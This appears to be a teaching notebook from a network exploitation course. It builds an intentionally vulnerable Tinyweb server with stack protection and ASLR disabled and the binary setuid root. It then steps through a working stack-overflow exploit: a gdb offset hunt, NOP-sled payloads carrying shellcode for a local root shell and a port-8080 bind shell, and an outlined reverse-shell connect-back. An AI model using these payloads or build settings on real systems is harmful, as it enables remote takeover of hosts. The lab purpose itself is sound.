# Network Exploitation

## A Simple Server Example

- a server that listens for TCP connection on port 7890
- when a client connects it sends a message *Hello there!* and receives data until connection is closed
- see demos/simple_server/ folder 
    - main.cpp and utility.h are the two files required to build the simple server
    - use the provided Makefile to build and run the executable


In [1]:
# check the working directory
%pwd

'/home/kali/projects/NetworkSecurity'

In [2]:
# list files and folders from current working directory
! ls

00-TableOfContents.ipynb   nmapResults.txt
arp-spoofing.png	   nmapResults.xml
demos			   port_bind_exploit.bin
graph.svg		   port_bind_shellcode.bin
hosts.txt		   README.md
icmp.pcap		   resources
junk.txt		   ScapyIntro.ipynb
labs			   ScapyScripts.ipynb
LICENSE			   ScapySendReceivePackets.ipynb
local_exploit.bin	   shellcode
NetworkExploitation.ipynb  SniffingWithScapy.ipynb
Networking.ipynb	   tracegraph.svg
NetworkSniffing.ipynb	   Traceroute-BashVsScapy.ipynb
NetworkUtility.ipynb	   washington.html


In [3]:
# change working directory to demos/simple_server
%cd demos/simple_server

/home/kali/projects/NetworkSecurity/demos/simple_server


In [4]:
! ls -al

total 176
drwxr-xr-x 2 kali kali  4096 Jul 20 14:00 .
drwxr-xr-x 5 kali kali  4096 Jun 23 12:41 ..
-rw-r--r-- 1 kali kali  2019 Jun 22 17:04 main.cpp
-rw-r--r-- 1 kali kali 84364 Jul 20 14:00 main.o
-rw-r--r-- 1 kali kali   797 Jun 22 15:54 Makefile
-rwxr-xr-x 1 kali kali 77768 Jul 20 14:00 simple_server.exe


In [5]:
! cat main.cpp

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <iostream>
#include "../util/utility.h"

#define PORT 7890	// the port users will be connecting to

using namespace std;

int main(void) {
	int sockfd, new_sockfd;  // listen on sock_fd, new connection on new_fd
	struct sockaddr_in host_addr, client_addr;	// my address information
	socklen_t sin_size;
	int recv_length=1, yes=1;
	char buffer[1024];

	if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
		fatal("in socket");

	if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)) == -1)
		fatal("setting socket option SO_REUSEADDR");
	
	host_addr.sin_family = AF_INET;		 // host byte order
	host_addr.sin_port = htons(PORT);	 // short, network byte order
	host_addr.sin_addr.s_addr = INADDR_ANY; // automatically fill with my IP
	memset(&(host_addr.sin_zero), '\0', 8); // zero the rest of the struct

	if (bind(sockfd, (st

In [6]:
! cat utility.h

cat: utility.h: No such file or directory


In [7]:
! cat Makefile

# rule for compiling program

COMPILER = g++
COMPILER_FLAGS = -c -g -Wall -std=c++17 -m32
BUILD_FLAGS = -m32 -fno-stack-protector -z execstack -no-pie

# list .cpp files separated by space
CPP_FILES = main.cpp

# executable program name
PROGRAM_NAME = simple_server.exe

# rule for compiling and building program
# make or make all triggers the following rule
build:
	# disable ASLR
	echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
	# compiles .cpp to object file .o
	$(COMPILER) $(COMPILER_FLAGS) $(CPP_FILES)
	# builds executable from object files
	$(COMPILER) $(BUILD_FLAGS) -o $(PROGRAM_NAME) *.o

# rule for running programming
# make run triggers the following rule
run:
	./$(PROGRAM_NAME)

# rule for clean up
# make clean triggers the following rule
clean:
	rm -f $(PROGRAM_NAME) *.o

In [8]:
# compile and build the executable
! echo kali | sudo -S make

# disable ASLR
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
0
# compiles .cpp to object file .o
g++ -c -g -Wall -std=c++17 -m32 main.cpp
# builds executable from object files
g++ -m32 -fno-stack-protector -z execstack -no-pie -o simple_server.exe *.o


### run  ./simple_server.exe from a terminal

```bash
┌──(kali㉿K)-[~/projects/NetworkSecurity/demos/simple_server]
└─$ make run                                                                 
./simple_server.exe
Server running on: 0.0.0.0:7890
```

- notice the log as clients connect to it

### install telnet client if not found

In [9]:
! telnet --help

telnet: invalid option -- '-'
Usage: telnet [-4] [-6] [-8] [-E] [-L] [-a] [-d] [-e char] [-l user]
	[-n tracefile] [ -b addr ] [-r] [host-name [port]]


In [10]:
! echo kali | sudo -S apt install telnet

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
telnet is already the newest version (0.17-42).
0 upgraded, 0 newly installed, 0 to remove and 65 not upgraded.


### run telnet client from another terminal
- interact with the server by sending some data on telnet prompt
```bash
telnet server_ip port
```
- telnet is line-buffered, hit enter to send data
    - e.g., hi from cleint...[enter]
- when done enter `ctrl ]` to close connection on telnet client prompt >
- enter quit command to quit the telnet client
```
telnet>quit
```


```bash
┌──(kali㉿K)-[~]
└─$ telnet 127.0.0.1 7890 
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
Hello there!
hi from client...
```

### simple_server log as the client sends data
```bash
┌──(kali㉿K)-[~/projects/NetworkSecurity/demos/simple_server]
└─$ make run                                                                 
./simple_server.exe
Server running on: 0.0.0.0:7890
server: got connection from 127.0.0.1 port 38656
RECV: 19 bytes
68 69 20 66 72 6f 6d 20 63 6c 69 65 6e 74 2e 2e | hi from client..
2e 0d 0a                                        | ...
```


### run telnet from a remote system
- interact with the server by sending some data on telnet prompt
- tlenet is line-buffered, hit enter to send data
- when done enter ctrl+] get the client prompt >
- enter quit to exit the telnet

```bash
    telnet <server ip> 7890
    this is a test from a remote system...
    here's some more data...
    do you read this from another system?
    ctrl+]
```

### check simple_serve log on the terminal
- notice `\x0D` and `\x0A` at the end of every data sent
- telnet and HTTP protocols expect lines/data to be terminted with these two bytes
    - carriage return and new line feed

In [11]:
# lets check the ASCII table
! man ascii | egrep "Hex|0A|0D"

       Oct   Dec   Hex   Char                        Oct   Dec   Hex   Char
       012   10    0A    LF  '\n' (new line)         112   74    4A    J
       015   13    0D    CR  '\r' (carriage ret)     115   77    4D    M


### telnet to a webserver
- open a terminal
- issue HEAD / HTTP/1.0 command and enter twice

```bash 
┌──(kali㉿K)-[~]
└─$ telnet example.com 80                                                                                
Trying 93.184.216.34...
Connected to example.com.
Escape character is '^]'.
HEAD /index.html HTTP/1.0 <--- HTTP HEAD Request
[enter][enter]

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Date: Tue, 22 Jun 2021 22:49:43 GMT
Last-Modified: Tue, 22 Jun 2021 22:44:04 GMT
Server: ECS (dna/63B1)
Content-Length: 94
Connection: close

Connection closed by foreign host.
```

- issue GET request

```bash
┌──(kali㉿K)-[~]
└─$ telnet example.com 80                                                                                
Trying 93.184.216.34...
Connected to example.com.
Escape character is '^]'.
GET /index.html HTTP/1.0

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Date: Tue, 22 Jun 2021 22:51:39 GMT
Last-Modified: Tue, 22 Jun 2021 22:44:04 GMT
Server: ECS (dna/63B1)
Content-Length: 94
Connection: close

<html><head><title>edgecastcdn.net</title></head><body><h1>edgecastcdn.net</h1></body></html>
Connection closed by foreign host.
```

## A Tiny Web Server
- similar to simple server but uses HTTP protocol to communicate
- handles HTTP GET and HEAD requests
- looks for the requested resource in the local directory callled `webroot` and sends it to the client/browser
- if the file/resource is not found, the server responds with 404 HTTP (`File Not Found`) error in response
- the demo web server is found in `demos/tinyweb/` folder
- use the provided Makefile to compile and build the Tinyweb server

```bash
$ cd <tinyweb_folder>
$ make
$ make run
```

In [12]:
# check the current working directory
%pwd

'/home/kali/projects/NetworkSecurity/demos/simple_server'

In [13]:
%cd ../tinyweb

/home/kali/projects/NetworkSecurity/demos/tinyweb


In [14]:
! cat main.cpp

#include <stdio.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include "../util/utility.h"
#include "../util/net_utility.h"

enum REQUEST_TYPE {GET, POST, HEAD, UNKNOWN};

using namespace std;

#define PORT 80   // the port users will be connecting to
#define WEBROOT "./webroot" // the web server's root directory

void handle_connection(int, struct sockaddr_in *); // handle web requests
int get_file_size(int); // returns the filesize of open file descriptor
void send_file_not_found(const int); // send file not found error
void send_file(const int, char *); // send file/resource requested

int main(void) {
   int sockfd, new_sockfd, yes=1; 
   struct sockaddr_in host_addr, client_addr;   // my address information
   socklen_t sin_size;

   printf("Accepting web requests on port %d\n", PORT);

   if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
      fatal

In [15]:
! cat webroot/index.html

<html>
	<head><title>A sample webpage</title>
	</head>
	<body bgcolor="#000000" text="#ffffffff">
		<center>
			<h1>Home<h1>

			<h3>This is a sample webpage....</h3>

			<p>...and this is a paragraph</p>

			<p>
				A simple link to <a href="http://example.com" target="__blank">Example.com</a>
			</p>

			<p>...and even a sample image:</p>
			<img src="image.jpg"><br>
		</center>
	</body>
</html>


In [16]:
! cat ../util/net_utility.h

#include <cstring>
#include <string>

using namespace std;

/* This function accepts a socket FD and a ptr to the null terminated
 * string to send.  The function will make sure all the bytes of the
 * string are sent.  Returns 1 on success and 0 on failure.
 */
int send_string(int sockfd, string buffer) {
   int sent_bytes, bytes_to_send;
   bytes_to_send = buffer.length();
   while(bytes_to_send > 0) {
      sent_bytes = send(sockfd, buffer.c_str(), bytes_to_send, 0);
      if(sent_bytes == -1)
         return 0; // return 0 on send error
      bytes_to_send -= sent_bytes;
      buffer += sent_bytes;
   }
   return 1; // return 1 on success
}

/* This function accepts a socket FD and a ptr to a destination
 * buffer.  It will receive from the socket until the EOL byte
 * sequence in seen.  The EOL bytes are read from the socket, but
 * the destination buffer is terminated before these bytes.
 * Returns the size of the read line (without EOL bytes).
 */
int recv_line(int sockfd, char 

In [17]:
! cat ../util/utility.h

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <string>

using namespace std;

// A function to display an error message and then exit
void fatal(string message) {
   char error_message[100];

   strcpy(error_message, "[!!] Fatal Error ");
   strncat(error_message, message.c_str(), 83);
   perror(error_message);
   exit(-1);
}

// An error checked malloc() wrapper function
void *ec_malloc(unsigned int size) {
   void *ptr;
   ptr = malloc(size);
   if(ptr == NULL)
      fatal("in ec_malloc() on memory allocation");
   return ptr;
}

// dumps raw memory in hex byte and printable split format
void dump(char *data_buffer, const unsigned int length) {
	unsigned char byte;
	unsigned int i, j;
	for(i=0; i < length; i++) {
		byte = data_buffer[i];
		printf("%02x ", data_buffer[i]);  // display byte in hex
		if(((i%16)==15) || (i==length-1)) {
			for(j=0; j < 15-(i%16); j++)
				printf("   ");
			printf("| ");
			for(j=(i-(i%16)); j <= i; j++) {  // display printable bytes

In [18]:
! echo kali | sudo -S make

# disable ASLR
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
0
# compiles .cpp to object file .o
g++ -c -g -Wall -std=c++17 -m32 main.cpp
# builds executable from object files
g++ -m32 -fno-stack-protector -z execstack -no-pie -o tinyweb.exe *.o
sudo chown root:root tinyweb.exe
sudo chmod u+s tinyweb.exe


In [19]:
! ls -al

total 212
drwxr-xr-x 3 kali kali  4096 Jul 20 14:12 .
drwxr-xr-x 5 kali kali  4096 Jun 23 12:41 ..
-rw-r--r-- 1 kali kali  1002 Jun 23 13:24 junk.txt
-rw-r--r-- 1 kali kali   530 Jun 23 23:21 local_exploit.bin
-rw-r--r-- 1 kali kali  5189 Jul 20 14:08 main.cpp
-rw-r--r-- 1 root root 90600 Jul 20 14:12 main.o
-rw-r--r-- 1 kali kali   864 Jun 23 13:08 Makefile
-rw-r--r-- 1 kali kali   530 Jun 23 23:59 port_bind_exploit.bin
-rwsr-xr-x 1 root root 84412 Jul 20 14:12 tinyweb.exe
drwxr-xr-x 2 kali kali  4096 Jun 23 11:27 webroot


### run tinyweb.exe from a terminal

```bash
┌──(kali㉿K)-[~/projects/NetworkSecurity/demos/tinyweb]
└─$ make run                                                                                           
./tinyweb.exe
Accepting web requests on port 80

```

### open a browser and browse to localhost
- you'll see the following log on the Tinyweb server's console

```bash
┌──(kali㉿K)-[~/projects/NetworkSecurity/demos/tinyweb]
└─$ make run                                                                                           
./tinyweb.exe
Accepting web requests on port 80
Got request from 127.0.0.1:51790 "GET / HTTP/1.1"
        Opening './webroot/index.html'   200 OK
Got request from 127.0.0.1:51792 "GET /image.jpg HTTP/1.1"
        Opening './webroot/image.jpg'    200 OK

```

## Tinyweb Stack Overflow Exploitation

- crash the Tinyweb server
- pawn the system
- find the flaw

## Crash Tinyweb server

- use a different VM or a machine (attacker machine)
- generate a junk data of 1000 bytes and send it to the server

In [20]:
! python3 -c 'print("A"*1000, end="\r\n")' > junk.txt

In [21]:
! hexdump -C junk.txt

00000000  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
*
000003e0  41 41 41 41 41 41 41 41  0d 0a                    |AAAAAAAA..|
000003ea


In [22]:
# count the number of bytes
! wc -c junk.txt

1002 junk.txt


### send junk
- replace tinyserver ip and port
- send the junk from different VM or system

#### attacker

```bash
$ cat junk.txt | nc -v [tinyseverip] [port]
```

#### target

```bash
┌──(kali㉿K)-[~/projects/NetworkSecurity/demos/tinyweb]
└─$ make run
./tinyweb.exe
Accepting web requests on port 80
make: *** [Makefile:29: run] Segmentation fault
```

## Pawn the System running Tinyweb server

- find the overlfow vulnerability
- find the return address and offset from `request` buffer

### Using GDB on a running process
- run the tinyweb.exe and get its process id to attach it to the gdb

```bash
┌──(kali㉿K)-[~/projects/NetworkSecurity/demos/tinyweb]
└─$ ps aux | grep tinyweb             
root       12385  0.0  0.0   2452   520 pts/3    S+   13:33   0:00 ./tinyweb.exe
kali       12398  0.0  0.0   6184   708 pts/4    S+   13:34   0:00 grep --color=auto tinyweb
```

- Attach gdb to the tinyweb server

```
$ sudo gdb -q --pid=[tinywebpid] --symbols=./tinyweb.exe
```

- use gdb to examine memory and addresses

```bash
┌──(kali㉿K)-[~/projects/NetworkSecurity/demos/tinyweb]
└─$ sudo gdb -q --pid=12385 --symbols=./tinyweb.exe
[sudo] password for kali: 
Reading symbols from ./tinyweb.exe...
Attaching to process 12385
Load new symbol table from "/home/kali/projects/NetworkSecurity/demos/tinyweb/tinyweb.exe"? (y or n) y
Reading symbols from /home/kali/projects/NetworkSecurity/demos/tinyweb/tinyweb.exe...
Reading symbols from /lib32/libc.so.6...
(No debugging symbols found in /lib32/libc.so.6)
Reading symbols from /lib/ld-linux.so.2...
(No debugging symbols found in /lib/ld-linux.so.2)
--Type <RET> for more, q to quit, c to continue without paging--c
0xf7fd0559 in __kernel_vsyscall ()  

(gdb) list main # list 10 lines around main
20      void handle_connection(int, struct sockaddr_in *); // handle web requests
21      int get_file_size(int); // returns the filesize of open file descriptor
22      void send_file_not_found(const int); // send file not found error
23      void send_file(const int, char *); // send file/resource requested
24
25      int main(void) {
26         int sockfd, new_sockfd, yes=1; 
27         struct sockaddr_in host_addr, client_addr;   // my address information
28         socklen_t sin_size;
29
(gdb)
(gdb) list 75 # list 10 lines around line #75
70              // receive one line from client and store it into request buffer
71              length = recv_line(sockfd, request);
72
73              printf("Got request from %s:%d \"%s\"\n", inet_ntoa(client_addr_ptr->sin_addr), ntohs(client_addr_ptr->sin_port), request);
74
75              ptr = strstr(request, " HTTP/"); // search for valid looking request
76              if(ptr == NULL) { // then this isn't valid HTTP
77                      printf(" NOT HTTP!\n");
78              } 
79              else {                                                                     

$ break 71 # break at recv_line function that has overrun issue

$ continue # make a get request using a terminal or browser to hit the breakpoint
$ print request
$ print /x &request # Note the address of request variable
$2 = (char (*)[500]) 0xffffc0e0
(gdb) 


$ x/16wx request+500 # examine 16 words at request+500 bytes in stack - return address must be definitely 500 bytes away from request!
(gdb) x/16wx request+500
0xffffc2d4:     0xffffc304      0x00000003      0x5e2b4400      0x0804c000
0xffffc2e4:     0xf7fab000      0xffffc338    **0x08049736**    0x00000004
0xffffc2f4:     0xffffc304      0xffffc300      0x080495d9      0x00000010
0xffffc304:     0x7cca0002      0x0100007f      0x00000000      0x00000000


(gdb) bt # find the return address to main
#0  handle_connection (sockfd=4, client_addr_ptr=0xffffc304) at main.cpp:71
#1  0x08049736 in main () at main.cpp:55

# return address to main is also stored at $ebp+4 
(gdb) x/x $ebp+4 # prints the return address
0xffffc2ec:     0x08049736

# OFFSET to return address
$ p /u <location of return address> - <request address> 
(gdb) p /u 0xffffc2ec-0xffffc0e0
$5 = 524

# find the address of about 100 bytes from the base of request (controlled return address)
(gdb) p /x request+100
$6 = 0xffffc144 

```

- exit the debugger and rerun the server on the same terminal

## Local Shellcode Exploit
- create a exploit code and send it to the server
- use a different terminal on the same system
- total length of string buffer = offset + 4 bytes

```bash
| NOP SLED \x90 | exploit code | repeated controlled return addrees to NOP SLED |

```
- find the size of the exploit code
- exploit codes can be found in `shellcode` subfolder of the NetworkExploitation folder

In [23]:
%pwd

'/home/kali/projects/NetworkSecurity/demos/tinyweb'

In [24]:
%cd ../../

/home/kali/projects/NetworkSecurity


In [25]:
!wc -c shellcode/shellcode_root.bin

35 shellcode/shellcode_root.bin


In [26]:
# size of nop sled = total buffer - shellcode size - repeated return address
(524+4)-35-(50*4)

293

In [27]:
# let's generate the shellcode
! python3 -c 'import sys; sys.stdout.buffer.write(b"\x90"*293)' > local_exploit.bin

In [28]:
%pwd

'/home/kali/projects/NetworkSecurity'

In [29]:
# let's append the shellcode at the end of the exploit code
! cat shellcode/shellcode_root.bin >> local_exploit.bin

In [30]:
! wc -c local_exploit.bin

328 local_exploit.bin


In [31]:
# let's append the 50 repeated controlled return address: 0xffffc144
! python3 -c 'import sys; sys.stdout.buffer.write(b"\x44\xc1\xff\xff"*50)' >> local_exploit.bin

In [32]:
# write the HTTP command delimeter end of request
! python3 -c 'import sys; sys.stdout.buffer.write(b"\r\n")' >> local_exploit.bin

In [33]:
! wc -c local_exploit.bin

530 local_exploit.bin


In [34]:
! hexdump -C local_exploit.bin

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000120  90 90 90 90 90 31 c0 31  db 31 c9 99 b0 a4 cd 80  |.....1.1.1......|
00000130  6a 0b 58 51 68 2f 2f 73  68 68 2f 62 69 6e 89 e3  |j.XQh//shh/bin..|
00000140  51 89 e2 53 89 e1 cd 80  44 c1 ff ff 44 c1 ff ff  |Q..S....D...D...|
00000150  44 c1 ff ff 44 c1 ff ff  44 c1 ff ff 44 c1 ff ff  |D...D...D...D...|
*
00000210  0d 0a                                             |..|
00000212


### send the exploit
- restart the Tinyweb server
- send the exploit code using netcat to the target from a terminal

```bash
┌──(kali㉿K)-[~/projects/NetworkSecurity]
└─$ cat local_exploit.bin | nc -v 127.0.0.1 80                                                                1 ⨯
localhost [127.0.0.1] 80 (http) open
```
- the server console should look like the following if successfully exploited

```bash
┌──(kali㉿K)-[~/projects/NetworkSecurity/demos/tinyweb]
└─$ ./tinyweb.exe
Accepting web requests on port 80
Got request from 127.0.0.1:51954 "�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�1�1ə��j
    XQh//shh/bin��Q��S��D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���"
 NOT HTTP!
# whoami
root
# pwd
/home/kali/projects/NetworkSecurity/demos/tinyweb                                  
# uname                                                                             
Linux
# 
```


## Remote Exploit - Port Binding Shellcode
- local exploit is not practical in real-world
- let's create a port binding shellcode so the attacker can remotely login to the victim once pwned
- use a different VM or system as an attacker machine
- create Port Binding Shellcode Exploit
- Generate Shellcode using GDB PEDA
- write the binary shellcode to a file
- add about 100 bytes to the beginning address of `request` buffer to get the working landing address

```bash
┌──(kali㉿K)-[~]
└─$ gdb -q           
gdb-peda$ shellcode generate
Available shellcodes:                                                                          
    x86/linux exec                                                                             
    x86/linux bindport                                                                        
    x86/linux connect                                                                         
    x86/bsd exec                                                                              
    x86/bsd bindport
    x86/bsd connect

# shellcode generate x86/linux bindport [port] [ip]
- pick a port # that's unlikely in use by the Tinyweb server
gdb-peda$ shellcode generate x86/linux bindport 8080 192.168.195.161
# x86/linux/bindport: 84 bytes
# port=8080, host=192.168.195.161
shellcode = (
    "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96"
    "\x43\x52\x66\x68\x1f\x90\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56"
    "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1"
    "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0"
    "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
    "\x89\xe1\xcd\x80"
)
gdb-peda$ quit
```

In [35]:
# let's write the shellcode to a file line by line for reuse
! python3 -c 'import sys; sys.stdout.buffer.write(b"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96")' > port_bind_shellcode.bin

In [36]:
! python3 -c 'import sys; sys.stdout.buffer.write(b"\x43\x52\x66\x68\x1f\x90\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56")' >> port_bind_shellcode.bin

In [37]:
! python3 -c 'import sys; sys.stdout.buffer.write(b"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1")' >> port_bind_shellcode.bin

In [38]:
! python3 -c 'import sys; sys.stdout.buffer.write(b"\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0")' >> port_bind_shellcode.bin

In [39]:
! python3 -c 'import sys; sys.stdout.buffer.write(b"\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53")' >> port_bind_shellcode.bin

In [40]:
! python3 -c 'import sys; sys.stdout.buffer.write(b"\x89\xe1\xcd\x80")' >> port_bind_shellcode.bin

In [41]:
! wc -c port_bind_shellcode.bin

84 port_bind_shellcode.bin


In [42]:
# lets create the exploit code to send to the server
# find the size of the NOP sled
528-84-(50*4)

244

In [43]:
! python3 -c 'import sys; sys.stdout.buffer.write(b"\x90"*244)' > port_bind_exploit.bin

In [44]:
# let's append the shellcode
! cat port_bind_shellcode.bin >> port_bind_exploit.bin

In [45]:
# let's write the repeated return address: 0xffffc144
! python3 -c 'import sys; sys.stdout.buffer.write(b"\x44\xc1\xff\xff"*50)' >> port_bind_exploit.bin

In [46]:
! wc -c port_bind_exploit.bin

528 port_bind_exploit.bin


In [47]:
# let's append the end of request delimeter \r\n
! python3 -c 'import sys; sys.stdout.buffer.write(b"\r\n")' >> port_bind_exploit.bin

In [48]:
! wc -c port_bind_exploit.bin

530 port_bind_exploit.bin


In [49]:
! hexdump -C port_bind_exploit.bin

00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000000f0  90 90 90 90 31 db 53 43  53 6a 02 6a 66 58 99 89  |....1.SCSj.jfX..|
00000100  e1 cd 80 96 43 52 66 68  1f 90 66 53 89 e1 6a 66  |....CRfh..fS..jf|
00000110  58 50 51 56 89 e1 cd 80  b0 66 d1 e3 cd 80 52 52  |XPQV.....f....RR|
00000120  56 43 89 e1 b0 66 cd 80  93 6a 02 59 b0 3f cd 80  |VC...f...j.Y.?..|
00000130  49 79 f9 b0 0b 52 68 2f  2f 73 68 68 2f 62 69 6e  |Iy...Rh//shh/bin|
00000140  89 e3 52 53 89 e1 cd 80  44 c1 ff ff 44 c1 ff ff  |..RS....D...D...|
00000150  44 c1 ff ff 44 c1 ff ff  44 c1 ff ff 44 c1 ff ff  |D...D...D...D...|
*
00000210  0d 0a                                             |..|
00000212


### Expolit the Tinyweb Server
- rerun the Tinyweb server on the target machine
- send `port_bind_exploit.bin` from a different VM to the target machine
    - this mimics real-world exploitation
- use netcat as demostrated in the local exploit above

```bash
┌──(kali㉿K)-[~/projects/NetworkSecurity]
└─$ cat port_bind_exploit.bin | nc -v <ip> 80 
```

- Tinyweb when exploited will run the port binding shellcode at port 8080 as shown below

```bash
┌──(kali㉿K)-[~/projects/NetworkSecurity/demos/tinyweb]
└─$ ./tinyweb.exe                                                             139 ⨯
Accepting web requests on port 80
Got request from 192.168.195.161:37546 "����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�SCSjjfX����CRfh�fS��jfXPQV���f��RRVC���f�jY�?Iy��
                                                                                   Rh//shh/bin��RS��D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���D���"
 NOT HTTP!

```
- use another terminal from the attcker machine to netcat to port 8080
- once connected, you'll not see the prompt `$` `or `#`, but you can still issue commands on the pwned target

```bash
┌──(kali㉿K)-[~]
└─$ nc -v 192.168.195.161 8080            
192.168.195.161: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.195.161] 8080 (http-alt) open
whoami
kali
ls
Makefile
junk.txt
local_exploit.bin
main.cpp
main.o
tinyweb.exe
webroot
```

## Remote Exploit - Connect-back Shellcode
- connecting to the victim machine is not easy due to firewall and IDS, IPS, etc.
- however, outgoing connection is typically allowed
- use the following exploit!
- use a different VM or system as an attacker machine
- create connect back (TCP Reverse connect) shellcode
- Generate Shellcode using GDB PEDA
    - IP address must be the address of the attacker for victim to connect back
    - Port can be any available higer port > 1024 on the attacker machine for victim to connect back to
- add about 100 bytes to the beginning address of request to get the working landing address


```bash
$ gdb -q
gdb-peda$ shellcode generate x86/linux connect port ip

```

- write shellcode to a file as binary one line at a time


```bash
$ python3 -c 'import sys; sys.stdout.buffer.write(b"shellcode line1")' > reverse_tcp.bin
$ python3 -c 'import sys; sys.stdout.buffer.write(b"shellcode line2")' >> reverse_tcp.bin
...
...
```

- calculate n and m to make exploit code
    - `[<NOP sled>*n + len(reverse_tcp.bin) + <return address>*m]`
- repeated return address = `<address of request> + 100`
- run a server on attacker machine so the victim can connect back
- port must be the same as used in the exploit code

```bash
$ nc -v -l -p port
```

- create the exploit code (connect_back_exploit_code.bin) as demonstrated in local exploit
- send the expploit code to the Tinyweb server using netcat

```bash
$ cat connect_back_exploit_code.bin | nc -v <target ip> 80
```
- check the terminal running the netcat server to verify if the victim is exploited and connected back to the attacker 